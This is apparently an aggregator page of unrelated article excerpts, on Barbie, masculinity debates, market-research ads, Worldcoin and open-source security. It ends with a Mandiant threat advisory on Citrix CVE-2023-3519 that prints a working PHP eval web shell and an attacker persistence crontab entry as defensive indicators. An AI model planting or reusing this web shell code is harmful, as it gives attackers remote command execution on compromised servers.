Page 1,034«..1020..1,0331,0341,0351,036..1,0401,050..»

What are the books Ken checks out of the library in Barbie? They’re … – Literary Hub

When Ken (Ryan Gosling) leaves Barbieland in the movie Barbie, he finds that he is not at all prepared for what hell find in The Real World, where men rule all. So, the character, whose main concern in life has thus far been Beach, heads to the Los Angeles public library system to broaden his horizons. We see him pulling inspo off the shelfbig, hardcover man books. (Unfortunately, he only has book. Books are better, explains Gosling in a GQ list of Ken Things Ryan Gosling Cant Live Without.)

The books do not seem to be actual objects in this world in the sense of being intellectual property with a Library of Congress catalog number. A peruse of Bookshop.org and the archives reveal nothing, leaving me to imagine the contents of the material that sends Ken on a bit of a mojo dojo tear.

First up?

Horses, by Ryan Bessin

This plausible-looking book appears to have been authored by someone who shares a name with a second assistant camera operator on the set of Barbie. Inside, we assume its got lots of pictures of horses running and whinnying and generally functioning as man-extenders. The kinds of horses you might print onto a duvet covet or paste onto your saloon doors. Lots of ideas!

The Origins of Patriarchy, by Haggarty or Hoggarty or something.

We assume this hardcover classic, which is shaped and fashioned like the kind of enormous book youd check out as a 6-year-old learning about the solar system, is a kind of Everymans guide to the atomic bomb, explaining to Ken the rudimentary elements of asserting the male gender as superior to all others (at the expense of other men), and painting a picture of men (who in fairness are often the nephews of a female aunt) running the show. We assume its got some Henry Kissinger, some Jordan Peterson, and some Hemingway all rolled into one toxic textbook.

Man Wars, by ???

Incredible that they could fit all the man wars into one single book, since all of the wars ever have been man wars, seemingly? Obviously, these stories are all told by the victors. Love that this is part of Kens vision board for life in the patriarchy. Bone up!

Notably missing from the pile? Real world books The Power Broker, A Time to Kill, Iron John, The Pale King, and Scar Tissue, all of which we think Ken would enjoy staging on the bedside table.

What did I miss?

Like Loading...

Excerpt from:
What are the books Ken checks out of the library in Barbie? They're ... - Literary Hub

Read More..

Men have a problem and it won’t be solved by either Andrew Tate … – The Independent

Stay ahead of the trend in fashion and beyond with our free weekly Lifestyle Edit newsletterStay ahead of the trend in fashion and beyond with our free weekly Lifestyle Edit newsletter

Caitlin Moran has some questions for men. Why do they only go to the doctor if their wife or girlfriend makes them? Why do they never discuss their penises with each other but make endless jokes about their balls? Is their fondness for super-skinny jeans leading to an epidemic of bad mental health? Are they allowed to be sad?

Published earlier this month, Morans What About Men? sees one of the nations most prolific feminist writers turn her attention to the problems facing men and masculinity. Marketed as a deep dive into the modern man, the book interrogates a range of issues, from mental health to sexuality. Its a noble pursuit. And yet, its one that has been ruthlessly torn apart. Critics have labelled it everything from patronising to full of flagrant stereotypes. One reviewer described it as rhetorical essentialism that lucratively pigeonholes men and women even at the risk of misconstruing both.

But in 2023, a time when misogyny is rife online and the likes of Andrew Tate and Jordan Peterson are upheld as stalwarts of masculinity, Morans questions are the kind we need to be asking more than ever. Why is it, then, nobody wants to answer them?

Moran has since responded to the backlash in an article in The Times, claiming that shes been confronted by two different kinds of critics: The first were all like, How dare you suggest men have problems with communicating their emotions? That is an incredibly old-fashioned and patronising generalisation, Moran writes. And the other half were like, How dare you suggest that men should communicate their emotions? Were not biologically designed to be emotional youre just trying to turn us into women.

Even this response, though, came under fire, with further critics arguing that Moran seemed to misunderstand why so many people were troubled by the book. That, rather, What About Men? flouted individualism to instead present men as one universal body with shared belief systems and behavioural traits, all of which seemed wildly outdated. And that the implication of her book was that men are in trouble and Moran is here to fix them.

According to gender studies academics, there are several issues with this thesis. The first is that men might not really be in trouble at all, at least not in the way Moran suggests. Historians have found people worrying about [the] crisis of masculinity throughout history, says Dr Ben Griffin, associate professor in modern British History at Girton College, University of Cambridge. But if a crisis is perpetual, its not really a crisis its just the way of things.

The real problem, he claims, is that masculinity cannot be discussed in such singular terms. If we asked a football fan, a vicar, and a banker to define manliness, we would probably get three very different answers, he says. When people talk about a crisis of masculinity, they are usually complaining that their preferred variety of masculinity seems to be losing prestige or influence relative to other forms of masculinity. Today, we have ideas of masculinity coming from all angles, whether its in sociology, pop culture, advertising, charities, TikTok, government campaigns, or around a table in the pub. Amid this cacophony of competing voices, it is harder than ever for any one form of masculinity to establish itself as culturally dominant, says Dr Griffin. To some people, that looks like a crisis.

A lot of men hear phrases like toxic masculinity and they simply withdraw. Or worse, it serves to confirm their sense of victimhood, so they chase insalubrious gurus who provide cheap hope and unhealthy ideology

Max Dickins

Thats not to say, though, that there arent issues that need solving. In her book, Moran cites a range of shocking statistics, among them that boys are more likely than girls to be medicated at school for disruptive behaviour, less likely to go on to further education, and more likely to become addicted to alcohol, drugs or pornography. Men also make up the vast majority of the homeless and prison populations. And on top of all that, the leading cause of death for men under 50 is suicide.

Other concerns have also emerged of late. Since the pandemic, there has been a notable rise in penile enlargement surgeries, for example, a trend that highlights societys obsession with defining masculinity in sexual terms by placing social currency on penis size. A different kind of crisis talk occurs when men find themselves incapable of performing their preferred variety of masculinity, explains Dr Griffin. For some, this might be aligned with sexual prowess and performance. Any sense of a shortcoming could then lead someone to feel as if its not possible to do the things that make you a real man. But then another question emerges: what does?

Its this lack of identity that seems to be at the heart of some of the biggest problems facing men today. We dont know how we are meant to be anymore, says Max Dickins, comedian and author of Billy No-Mates: How I Realised Men Have a Friendship Problem. What Morans book represents is a stylish exemplar of a discourse that has become stuck. The think pieces [and] the books all tend to have the same form: Here are mens problems! The reason for said problems is that men are stuck in a box of toxic masculine norms! If only men could behave more like women!

Of course, the fact any book is prompting further interrogation into these issues is largely a good thing. But perhaps something has to change about the tone of that interrogation if were ever going to make progress. We need a shift that encourages men to get involved in the conversation, or at least, stops casually insulting them, says Dickins. A lot of men hear phrases like toxic masculinity and they simply withdraw. Or worse, it serves to confirm their sense of victimhood, so they chase insalubrious gurus who provide cheap hope and unhealthy ideology.

Caitlin Morans What About Men?

(Ebury)

In her response piece, Moran speculates that one of the reasons why her book prompted such a backlash is because it was written by a woman. It was the first question on [the] first night of the tour that resolved my confusion over the backlash, she writes. You joke that you wish a man had written this book, said a man in the audience. But how could he? Can you imagine a man saying, What about men? Pay us attention! Its our turn now! Wed be torn to bits. It had to be a woman who said it first.

Its a fair point, one that highlights how far we have to go in order to achieve meaningful change. After all, no ones denying that Morans book isnt at least attempting to do something important. But perhaps the response illustrates just how complex an attempt it is given how charged conversations around gender can be; whatever you say, and whoever says it, therell inevitably be a group of people armed to attack or discredit your argument.

That being said, Morans book went straight to Number One on the Sunday Times bestseller list. Evidently, and despite peoples protests, there is clearly an audience for her perspective. And progress is being made, even if it might not feel like that. Would a book like this even have been published five years ago? And if it had, would anyone have wanted to actually read it? Would Moran fill out rooms of people on a nationwide book tour, all of whom had paid to listen to what she has to say about men?

The truth is that there are always going to be certain belief systems holding people back, no matter how hard Moran or anyone else tries. Thats just the nature of conversations around masculinity. In general, its a good thing for people to recognise that there is no one way of being a man, says Dr Griffin. It might also be useful to acknowledge that the same man performs many different masculinities in the course of a day. The individual who is a devoted family man caring for a dying parent might be a ruthless businessman in the office and a clown in the pub.

The important thing thats often missing from these conversations, both online and off, is nuance. Accepting that one persons definition of being a man is different from anothers, and that no two men perform masculinity in the same way, is key to becoming a more progressive and inclusive society that can benefit all genders. But getting there could take some time.

Theres always an audience of people who like to be told that their complex problems have simple solutions, adds Dr Griffin. Plus, some men seem incapable of realising that Fight Club was a satire.

What About Men? is available now

View original post here:
Men have a problem and it won't be solved by either Andrew Tate ... - The Independent

Read More..

Exploring Market Dynamics and Growth Drivers: Healthcare Internet … – Glasgow West End Today

[Vancouver, Canada, 25-07-2023] An Emergen Research report of 250 pages features 194 tables, 189 charts, and graphics. Our new study is ideal for anyone who wants to learn about the global Healthcare Internet of Things (IoT) Security market commercially and deeply, as well as to analyze the market segments in depth. With the help of our recent study, you can analyze the entire regional and global market for Healthcare Internet of Things (IoT) Security. To increase market share, you must obtain financial analysis of the entire market and its segments. Our research suggests there are significant opportunities in this rapidly expanding market. Look at how you might take advantage of these revenue-generating opportunities. Additionally, the research will help you develop growth strategies, strengthen competitor analysis, and improve business productivity by enabling you to make better strategic decisions.

Key Benefits For Stakeholders:

Request Free Sample Copy (To Understand the Complete Structure of this Report [Summary + TOC]) @Click here to get your free sample PDF

The global Healthcare Internet of Things (IoT) security market size is expected to reach USD 5.52 Billion at a steady revenue CAGR of 21.6% in 2028, according to latest analysis by Emergen Research. Rising concerns for security of critical infrastructure in the healthcare sector is a major factor driving global healthcare Internet of Things (IoT) security market revenue growth.

Competitive Landscape:

The leading companies operating in the Healthcare Internet of Things (IoT) Security market have been enumerated in this report. This section of the report lays emphasis on the geographical reach and production facilities of these companies. To get ahead of their rivals, the leading players are focusing more on offering products at competitive prices, according to our analysts.

Some major companies in the global market report includeCisco Systems Inc., Oracle Corporation, Intel Corporation, Trend Micro Inc., Kaspersky Lab, Deutsche Telekom AG, Dell Corporation, Inside Secure SA, Agile Cyber Security Solutions, LLC., and Symantec Corporation

Information Found Nowhere Else

With our new report, you are less likely to fall behind in knowledge or miss out on opportunities. See how our work could benefit your research, analyses, and decisions. Emergen Research study is for everybody needing commercial analyses for the Healthcare Internet of Things (IoT) Security Market, 2022 to 2032, market-leading companies. You will find data, trends and predictions.

The research may be useful for leading businesses looking for new sources of income, as well as for businesses aiming to diversify into new markets or expand their current operations, as well as for businesses seeking to diversify into new markets.

The global Healthcare Internet of Things (IoT) Security industry is highly consolidated owing to the presence of renowned companies operating across several international and local segments of the market. These players dominate the industry in terms of their strong geographical reach and a large number of production facilities. The companies are intensely competitive against one another and excel in their individual technological capabilities, as well as product development, innovation, and product pricing strategies.

Emergen Research is Offering Limited Time Discount@ Click here to grab your Copy at Discounted Price

Market Segmentation:

The report bifurcates the Healthcare Internet of Things (IoT) Security market on the basis of different product types, applications, end-user industries, and key regions of the world where the market has already established its presence. The report accurately offers insights into the supply-demand ratio and production and consumption volume of each segment.

Regional Landscape section of the Healthcare Internet of Things (IoT) Security report offers deeper insights into the regulatory framework, current and emerging market trends, production and consumption patterns, supply and demand dynamics, import/export, and presence of major players in each region.

Custom Requirements can be requested for this Report@ Click here to request Customization

Global Healthcare Internet of Things (IoT) SecurityMarket Highlights:

Key features and benefits of Emergen Research market research content include:

Browse Full Report Description + Research Methodology + Table of Content + Infographics@Click here to study complete Report description

Explore More Related Report :

Pilates And Yoga Studios Market

Pilates And Yoga Studios Market

Pilates And Yoga Studios Market

Pilates And Yoga Studios Market

Pilates And Yoga Studios Market

Dermocosmetics Market

Dermocosmetics Market

Dermocosmetics Market

Dermocosmetics Market

Dermocosmetics Market

Dermocosmetics Market

Dermocosmetics Market

Dermocosmetics Market

Dermocosmetics Market

Dermocosmetics Market

About Emergen Research

Emergen Research is a market research and consulting company that provides syndicated research reports, customized research reports, and consulting services. Our solutions purely focus on your purpose to locate, target, and analyze consumer behavior shifts across demographics, across industries, and help clients make smarter business decisions. We offer market intelligence studies ensuring relevant and fact-based research across multiple industries, including Healthcare, Touch Points, Chemicals, Types, and Energy.

Contact Us:

Eric Lee

Corporate Sales Specialist

Emergen Research | Web:https://www.emergenresearch.com/

Direct Line: +1 (604) 757-9756

E-mail:sales@emergenresearch.com

Read more:
Exploring Market Dynamics and Growth Drivers: Healthcare Internet ... - Glasgow West End Today

Read More..

Global DDoS Protection Market Size and Forecast | Nexusguard Ltd … – Glasgow West End Today

New Jersey, United States The Global DDoS ProtectionMarket is comprehensively and accurately detailed in the report, taking into consideration various factors such as competition, regional growth, segmentation, and market size by value and volume. This is an excellent research study specially compiled to provide the latest insights into critical aspects of the Global DDoS Protection market. The report includes different market forecasts related to market size, production, revenue, consumption, CAGR, gross margin, price, and other key factors. It is prepared with the use of industry-best primary and secondary research methodologies and tools. It includes several research studies such as manufacturing cost analysis, absolute dollar opportunity, pricing analysis, company profiling, production and consumption analysis, and market dynamics.

The competitive landscape is a critical aspect every key player needs to be familiar with. The report throws light on the competitive scenario of the Global DDoS Protection market to know the competition at both the domestic and global levels. Market experts have also offered the outline of every leading player of the Global DDoS Protection market, considering the key aspects such as areas of operation, production, and product portfolio. Additionally, companies in the report are studied based on key factors such as company size, market share, market growth, revenue, production volume, and profits.

Get Full PDF Sample Copy of Report: (Including Full TOC, List of Tables & Figures, Chart) @https://www.verifiedmarketresearch.com/download-sample/?rid=2762

Leading 10 Companies in the Global DDoS Protection Market Research Report:

Nexusguard Ltd, Dosarrest Internet Security Ltd, Imperva, Arbor Networks Corero Network Security Radware Ltd., Neustar Akamai Technologies Cloudflare F5 Networks, Inc.

Global DDoS ProtectionMarket Segmentation:

DDOS PROTECTION MARKET, BY ORGANIZATION SIZE

Large Companies Small and Medium Businesses

DDOS PROTECTION MARKET, BY APPLICATION AREA

Endpoint Application Network Database

DDOS PROTECTION MARKET, BY DEPLOYMENT MODEL

Cloud-based On-premise Hybrid

DDOS PROTECTION MARKET, BY COMPONENT

Solution

Service

Managed Service

Professional Service

Training and education

DDOS PROTECTION MARKET, BY VERTICAL

Government and Defense

IT and Telecommunications

Banking, Financial Services, and Insurance (BFSI)

Retail

Healthcare

Energy and Utilities

Others

The report comes out as an accurate and highly detailed resource for gaining significant insights into the growth of different product and application segments of the Global DDoS Protection market. Each segment covered in the report is exhaustively researched about on the basis of market share, growth potential, drivers, and other crucial factors. The segmental analysis provided in the report will help market players to know when and where to invest in the Global DDoS Protection market. Moreover, it will help them to identify key growth pockets of the Global DDoS Protection market.

The geographical analysis of the Global DDoS Protection market provided in the report is just the right tool that competitors can use to discover untapped sales and business expansion opportunities in different regions and countries. Each regional and country-wise Global DDoS Protection market considered for research and analysis has been thoroughly studied based on market share, future growth potential, CAGR, market size, and other important parameters. Every regional market has a different trend or not all regional markets are impacted by the same trend. Taking this into consideration, the analysts authoring the report have provided an exhaustive analysis of specific trends of each regional Global DDoS Protection market.

Inquire for a Discount on this Premium Report@ https://www.verifiedmarketresearch.com/ask-for-discount/?rid=2762

What to Expect in Our Report?

(1) A complete section of the Global DDoS Protection market report is dedicated for market dynamics, which include influence factors, market drivers, challenges, opportunities, and trends.

(2) Another broad section of the research study is reserved for regional analysis of the Global DDoS Protection market where important regions and countries are assessed for their growth potential, consumption, market share, and other vital factors indicating their market growth.

(3) Players can use the competitive analysis provided in the report to build new strategies or fine-tune their existing ones to rise above market challenges and increase their share of the Global DDoS Protection market.

(4) The report also discusses competitive situation and trends and sheds light on company expansions and merger and acquisition taking place in the Global DDoS Protection market. Moreover, it brings to light the market concentration rate and market shares of top three and five players.

(5) Readers are provided with findings and conclusion of the research study provided in the Global DDoS Protection Market report.

Key Questions Answered in the Report:

(1) What are the growth opportunities for the new entrants in the Global DDoS Protection industry?

(2) Who are the leading players functioning in the Global DDoS Protection marketplace?

(3) What are the key strategies participants are likely to adopt to increase their share in the Global DDoS Protection industry?

(4) What is the competitive situation in the Global DDoS Protection market?

(5) What are the emerging trends that may influence the Global DDoS Protection market growth?

(6) Which product type segment will exhibit high CAGR in future?

(7) Which application segment will grab a handsome share in the Global DDoS Protection industry?

(8) Which region is lucrative for the manufacturers?

For More Information or Query or Customization Before Buying, Visit @ https://www.verifiedmarketresearch.com/product/global-ddos-protection-market-size-and-forecast-to-2025/

About Us: Verified Market Research

Verified Market Research is a leading Global Research and Consulting firm that has been providing advanced analytical research solutions, custom consulting and in-depth data analysis for 10+ years to individuals and companies alike that are looking for accurate, reliable and up to date research data and technical consulting. We offer insights into strategic and growth analyses, Data necessary to achieve corporate goals and help make critical revenue decisions.

Our research studies help our clients make superior data-driven decisions, understand market forecast, capitalize on future opportunities and optimize efficiency by working as their partner to deliver accurate and valuable information. The industries we cover span over a large spectrum including Technology, Chemicals, Manufacturing, Energy, Food and Beverages, Automotive, Robotics, Packaging, Construction, Mining & Gas. Etc.

We, at Verified Market Research, assist in understanding holistic market indicating factors and most current and future market trends. Our analysts, with their high expertise in data gathering and governance, utilize industry techniques to collate and examine data at all stages. They are trained to combine modern data collection techniques, superior research methodology, subject expertise and years of collective experience to produce informative and accurate research.

Having serviced over 5000+ clients, we have provided reliable market research services to more than 100 Global Fortune 500 companies such as Amazon, Dell, IBM, Shell, Exxon Mobil, General Electric, Siemens, Microsoft, Sony and Hitachi. We have co-consulted with some of the worlds leading consulting firms like McKinsey & Company, Boston Consulting Group, Bain and Company for custom research and consulting projects for businesses worldwide.

Contact us:

Mr. Edwyne Fernandes

Verified Market Research

US: +1 (650)-781-4080UK: +44 (753)-715-0008APAC: +61 (488)-85-9400US Toll-Free: +1 (800)-782-1768

Email: sales@verifiedmarketresearch.com

Website:- https://www.verifiedmarketresearch.com/

Originally posted here:
Global DDoS Protection Market Size and Forecast | Nexusguard Ltd ... - Glasgow West End Today

Read More..

Right-wing media spread misinformation on proposed Michigan … – Media Matters for America

National Review, which mockingly assigned the state of Michigan they/them pronouns in its headline, did even less to engage with the text of the bill, quoting only the terrorized, frightened, or threatened portion of the definition.

Newsweek declared that the law probably is unconstitutional in a headline, cherry-picking from a source in the body of the article. A thorough read reveals that the source, Georgia State University law professor Eric J. Segall, explained that his assessment of the pending laws constitutionality depends on a specific hypothetical interpretation and application of it, and that he personally believed the law should be constitutional.

Newsweek also found a way to work trans influencer Dylan Mulvaney into its coverage of the bill.

Sinclair Broadcast Group conducted a poll using the misguided framing through its weekday program, The National Desk, which syndicated the results to the websites of local outlets owned by the organization throughout the country.

And The Daily Callers Chrissy Clark published an editorial bizarrely fantasizing about using the law to target unhoused people, whom she described as terrorizing, frightening and occasionally threatening.

As The Detroit News pointed out, conservative outlets peddling misinformation ignored or dismissed a key part of the bills definition of intimidation: that it does not apply to constitutionally protected activity.

"People can say whatever they want, that 'I feel frightened because somebody misgendered me.' But that's not going to cut it for purposes of this bill, a Democratic prosecutor in the state told the outlet.

This manufactured controversy is nothing new for right-wing media. Canadian psychologist and Daily Wire host Jordan Peterson captured media attention in 2016 when he made similar allegations about Canadian bill C-16. The subsequent law added gender identity or expression to other preexisting anti-discrimination protections, including in the criminal code. As a result, Peterson incorrectly alleged someone could see jail time for misgendering a trans person.

He has since stepped down from his position at the University of Toronto and could potentially lose his license to practice psychology.

More:
Right-wing media spread misinformation on proposed Michigan ... - Media Matters for America

Read More..

Chat GPT boss unveils plans to scan people’s EYEBALLS to help prove they are human on the internet in bid to c – Daily Mail

The boss of the AI tool ChatGPT has unveiled plans to scan the eyeballs of billions of people worldwide amid a growing privacy row.

Sam Altman of OpenAI which created the chatbot said the move would allow users to prove they are human and not a robot or online fraudster.

The firm has put football-sized 'Worldcoin' scanning devices in locations in Britain and 19 other countries.

Passers-by are encouraged to have their irises scanned to generate a unique digital record called a World ID.

It has sparked privacy and security concerns among the authorities about the sensitive data it gathers and who has access to it.

The Information Commissioner's Office, which upholds the UK's data privacy rights, warned it had begun examining the business.

Ahead of its launch on Monday, Worldcoin had already attracted two million sign-ups, with people queuing at three pop-up sites in London.

Those taking part receive 25 cryptocurrency tokens valued at 1.56 each.

The 'orbing' process, in which the user stares into the camera lens for ten seconds until a beep sounds signalling completion, has been deployed in 35 cities in 20 countries, with plans to roll out 1,500 across the globe.

However, its rollout in the US has been held up amid regulatory issues.

Mr Altman said the project will help humans keep up in an economy set to be reshaped by AI, describing it as a 'global financial and identity network based on proof of personhood'.

It could be used to verify those eligible for benefits and reduce fraud, he said. The OpenAI website suggests the technology could also be used as voter ID in elections.

OpenAI said more than two million people have been added to its database in 33 different countries since the scanners first began testing two years ago.

See more here:
Chat GPT boss unveils plans to scan people's EYEBALLS to help prove they are human on the internet in bid to c - Daily Mail

Read More..

The Power of Open Source Cybersecurity: Transparency and … – Infosecurity Magazine

Technology and its use is ever-changing. As a result, the importance of open source cybersecurity rapidly grows. Open source is leveraging the power of transparency and community to drive innovation. And yet its the subject of many misconceptions. This article aims to dispel those misconceptions and highlight the many reasons open source is a vital part of cybersecurity.

A common misconception is that open source is less secure than proprietary solutions. This stems from false notions that there's no accountability, less quality control, a lack of support, and the availability of the code makes it easier for attackers to identify and exploit vulnerabilities. The truth is far from that - on average, a company and community works together through a rigorous development process including peer reviews, and multiple layers of audits. Vulnerabilities are generally identified and addressed quickly. Theres also a knowledgeable and vibrant support community.

The very nature of open source encourages knowledge sharing. The result is development, support and audits that are all community-driven. Security experts are free to scrutinise the code, identify vulnerabilities, and suggest improvements. The community may perform code reviews, theres a diverse group vetting and polishing. In effect, an open source community can become a small army of experts collaborating towards a better product and better security.

Bug bounties are another aspect of open source. As another way of fostering collaboration, organisations or individuals will offer rewards to those who discover and report vulnerabilities in the code. This incentivises the community to take an active role in the detection and remediation of issues, creating a powerful feedback loop for continuous improvement.

Transparency is the backbone of the open source movement. Unlike proprietary solutions where you have to trust that strong security measures are in place, with open source you can see for yourself or draw on the collective expertise of the community. With access to the source code, its much easier for organisations to understand and manage the components that make up the infrastructure. You have peace of mind that the tool operates within your existing ecosystem. This also makes it possible to ensure the software meets your industry standards and regulations. This transparency serves as a foundation for trust and confidence.

Open source empowers users to take control of their cybersecurity by providing access and visibility. Proprietary solutions arent extensible and dont allow modification of source code to meet specific needs. The level of control open source provides, allows organisations ownership over their security infrastructure. It also encourages user education, through the source code users can see how the software works and gain an understanding of its security measures. This empowers them to make more informed decisions about cybersecurity.

There are a number of notable open source solutions. You can start by supporting them through collaboration, using their services, and sharing the excitement with others. These and other open source solutions truly demonstrate how awesome cybersecurity can be with a community backing them:

Mailvelope is an open source browser add-on that offers end-to-end encryption for email communication. It allows continued use of your existing email address while providing private encryption - all through the extension. Mailvelope is transparent about their encryption algorithms, regularly audited, and made in the EU.

Mullvad VPN is a VPN that believes everyone has the right to privacy and access to the internet without being surveilled. It operates on open source principles and a majority of their development process is done openly with a large open source base.

Passbolt is an open source password manager designed for security-conscious organisations seeking a centralised and secure way of organising and sharing information. At its core, the platform is driven by security, and that's reflected in its security model. Even in paid versions, passbolt is fully open source, allowing full transparency and code review.

uBlock Origin is an open source content blocking browser extension thats easy on CPU and memory. It blocks ads, trackers, malicious URLs, and allows you to build your own filters. uBlock is dedicated to educating people about their right to privacy. Theres a very active community contributing to its improvement and making browsing safer for everyone.

Open source is an extraordinary force for change with cybersecurity being a prominent beneficiary. Its strengths of transparency, collaboration, community and user empowerment have the potential to revolutionise how we approach security and privacy. To continue to grow and innovate, its important to support and embrace open source initiatives. Lets start forging a future that prioritises security, privacy, personal freedom, and fosters an ecosystem where trust and security are not only desirable but inherent. With open source, we don't just protect ourselves; we empower the community to protect us all.

Read the original:
The Power of Open Source Cybersecurity: Transparency and ... - Infosecurity Magazine

Read More..

Exploitation of Citrix Zero-Day by Possible Espionage Actors (CVE … – Mandiant

Note: This is a developing campaign under active analysis. We will continue to add more indicators, hunting tips, and information to this blog post as needed.

Security and networking devices are "edge devices," meaning they are connected to the internet. If an attacker is successful in exploiting a vulnerability on these appliances, they can gain initial access without human interaction, which reduces the chances of detection. As long as the exploit remains undiscovered, the threat actor can reuse it to gain access to additional victims or reestablish access to targeted systems. Additionally, both edge devices and virtualization software are difficult to monitor and may not support endpoint detection and response (EDR) solutions or methods to detect modifications or collect forensic images, which further reduces the likelihood of detection and complicates attribution. Notably since at least 2021, cyber espionage threat actors have focused on edge devices, particularly security, networking, and virtualization technologies to gain persistent access to victim networks, while evading detection.

On July 18, Citrix released security bulletin CTX561482, which described vulnerabilities in Citrix Netscaler Application Delivery Controller (ADC) and Citrix Netscaler Gateway. One of the vulnerabilities, CVE-2023-3519, could allow an unauthenticated remote attacker to perform arbitrary code execution. This vulnerability was assigned a CVSS of 9.8. Citrix has stated that they have observed exploitation of this vulnerability in the wild. Mandiant is actively involved in investigations involving recently compromised ADC appliances that were fully patched prior to the July 18 patches to address CVE-2023-3519. Predominately used in the information technology industry, ADCs are a vital component of enterprise and cloud data centers in ensuring the continuous improvement and the availability, security, and performance of applications. ADCs provide functions that optimize the delivery of enterprise applications across the network.

Mandiant strongly recommends that organizations follow Citrixs advice to patch vulnerable appliances as soon as possible.Mandiant classifies CVE-2023-3519 as a high-risk vulnerability because it allows for remote code execution without any known offsets. While this vulnerability has been exploited in the wild, the exploit code is not yet publicly available. Mandiant recommends that organizations prioritize patching this vulnerability.

During analysis of the compromised appliance, Mandiant identified a simple PHP eval web shell located in /var/vpn/themes. The web shell had the earliest file system modified time of all the identified malware and was relatively compact (113 bytes). As a result, Mandiant assessed with moderate confidence that the web shell was placed on the system as part of the initial exploitation vector.

The threat actor used the web shell to modify the NetScaler configuration. In particular, they attempted to deactivate the NetScaler High Availability File Sync (nsfsyncd). Additionally, the threat actor attempted to remove processes from the Citrix Monitor configured within the file /etc/monitrcbefore finally killing the Monitor process. Shortly thereafter, various NetScaler logs recorded a critical failure, which resulted in the creation of the NetScaler Packet Processing Engine (NPPE) core dump three minutes after the exploitation attempt and the appliance restart. Mandiant analyzed this dump file and identified strings related to HTTP requests that occurred at the same time as the creation of the first web shell.

Based on code similarities, specifically the structure of the commands, Mandiant has high confidence these samples are related to exploitation of CVE-2023-3519. At the time of writing, there is no public proof of concept code for this vulnerability. To avoid potentially leaking details of how to exploit the vulnerability to other threat actors, Mandiant will not detail how the vulnerability was exploited. Some examples that follow may support triage when dealing with this activity. For example, within one POST request the threat actor took a number of actions:

The sequence of commands as extracted from the request is as follows (note in log files and crash dumps some characters may be URL encoded).

Mandiant identified additional web shells and malicious ELF files that the threat actor uploaded to the vulnerable appliance after initial exploitation. All of the web shells were observed in the /var/vpn/themes directory; however, there is no reason the threat actor could not create web shells in other public-facing directories. Mandiant observed two types of web shells:

Details on these web shells are included in the following section.

Moreover, the threat actor also installed a persistent tunneler on the appliance with a filename of the. The tunneler provided encrypted reverse TCP/TLS connections to a hard-coded command and control address. The tunneler was derived from the open-source ligolo-ng Github project. Mandiant believes the hard-coded address is victim specific. The attacker created a crontab entry for the `nobody` user to ensure the tunneler ran persistently.

30 02 * * * nohup /var/tmp/the &

The threat actor copied an additional tunneler, version 0.26.10 of the open-source NPS project, to the compromised appliance with filename npc. NPS is a fully-featured tunneler written in Go. It can be configured from the command line or with a configuration file. The tunneler also has the ability to instantiate a local file server, allowing the remote user to download files from the system.

Mandiant identified six unique web shells on an impacted Netscaler. These included:

The initial web shell identified on the impacted Netscaler was an eval web shell, info.php. The contents of info.php can be seen as follows:

The web shells prod.php, log.php, vpn.php, and logout.php, are part of the SECRETSAUCE family of web shells. These web shells are nearly identical, with the exception of the embedded RSA public key. SECRETSAUCE is a PHP web shell that receives commands via POST parameters and executes them on the device. The shell contains a hard-coded RSA public key that is used to decrypt the provided POST parameters before passing them to PHPs built-in evalfunction.

The code comprising the primary functionality of prod.php is included as follows:

class rsa{ public $key; public $a; public $cmd;

public function keys() { $this->key = <<

return $this->key; }

public function run($a = NULL) { return @eval($a); }

public function get($qs) { $this->cmd = $_POST[1]; $cmds = explode("|", $this->cmd); $pk = openssl_pkey_get_public(rsa::keys()); $this->cmd = ''; foreach ($cmds as $value) { if ($qs(rsa::decode($value), $de, $pk)) { $this->cmd .= $de;

} } return $this->cmd; }

public function decode($e = NULL) { return base64_decode($e); }}

$z = new rsa();$z->run($z->get('openssl_public_decrypt'));

The final web shell, config.php, was identified as a sample of REGEORG.NEO. REGEORG.NEO is a publicly available web shell and web shell generation tool intended as an improvement to the REGEORG project. REGEORG is a python utility and collection of web shells that when used together establish a SOCKS proxy on the system where the web shell was placed. Threat actors use REGEORG to tunnel activities from their systems into compromised networks.

Given the scope and sophistication of this threat actor, Mandiant recommends that organizations rebuild any appliances that have been exploited. The ADC upgrade process overwrites some, but not all, of the directories where threat actors may create web shells, potentially leaving the appliance in a compromised state.

Organizations should evaluate whether their ADC or Gateway appliance management ports require unrestricted Internet access. Limiting the Internet access to only necessary IP addresses (such as Citrix related addresses) would make post-exploitation activities of this and any future vulnerabilities more difficult.

Additionally, Mandiant has observed the threat actor copying the ADC ns.conf file as well as keys stored on the file system that are used to encrypt secrets within the configuration file. Public tooling exists to decrypt the ns.confsecrets although Mandiant has not validated it works for the most recent appliance versions. Given these TTPs, Mandiant recommends that impacted organizations rotate all secrets stored in the configuration file as well as any private keys and certificates that may be used for TLS connections.

Mandiant recommends hardening susceptible accounts in the domain to reduce the likelihood of credential exposure via Kerberoasting and to limit a potential threat actor's ability to obtain credentials for lateral movement throughout the environment.

Mandiant recommends organizations use available logs and Endpoint Detection & Response (EDR) telemetry to hunt for authentication attempts sourced from Netscaler management addresses (NSIPs) to all endpoints in the environment. Mandiant observed authentication attempts by the threat actor sourced from NSIPs of impacted Netscalers both via Remote Desktop Protocol (RDP) logons and network logons to endpoints within the victim's environment. Additional information recorded in these events may capture both hostnames and IP addresses belonging to attacker infrastructure to further pivot and hunt for in the environment. It is unexpected and suspicious to observe traffic to the internal network and miscellaneous (non-Citrix) Internet IP addresses from the NSIP of an appliance. Rotate credentials for any impacted/targeted accounts identified in these attempts.

Review relevant firewall logs for any network based indicators identified. Additionally, Mandiant observed the stringpwd;pwd;pwd;pwd;pwd;used within the exploit POST requests which can aid hunting. Also, prior to upload of the initial web shell, Mandiant identified requests by a Headless Chrome User Agent (executed via CLI) included as follows:

Furthermore, Mandiant recommends review of HTTP error logs for potential crashes, which can be indicative of vulnerability exploitation.

Mandiant observed LDAP queries sourced from NSIPs of impacted Netscalers in an attempt to identify accounts vulnerable to Kerberoasting. A sample query can be seen as follows:

Mandiant recommends review of the following directories and subdirectories for the presence of web shells:

In order to identify malicious ELF binaries, Mandiant recommends review of the/tmp/directory. Similarly, review of files with timestamps after the Netscaler was last patched is especially important.

In review of NSPPE core (Netscaler Packet Processing Engine) dumps, Mandiant identified commands executed by the threat actor to redirect the contents ofns.conf,F1.key, andF2.keyto a renamed JavaScript file for exfiltration. Mandiant recommends reviewing relevant NSPPE core dumps in the/core/directory in order to identify similar activity. Rotation of the keys is recommended if similar activity is observed in NSPPE core dumps.

Finally, Mandiant recommends review of/var/crontabs/nobodyfor scheduled execution of suspicious binaries. Mandiant identified a crontab for the aforementioned ELF tunneler, the.

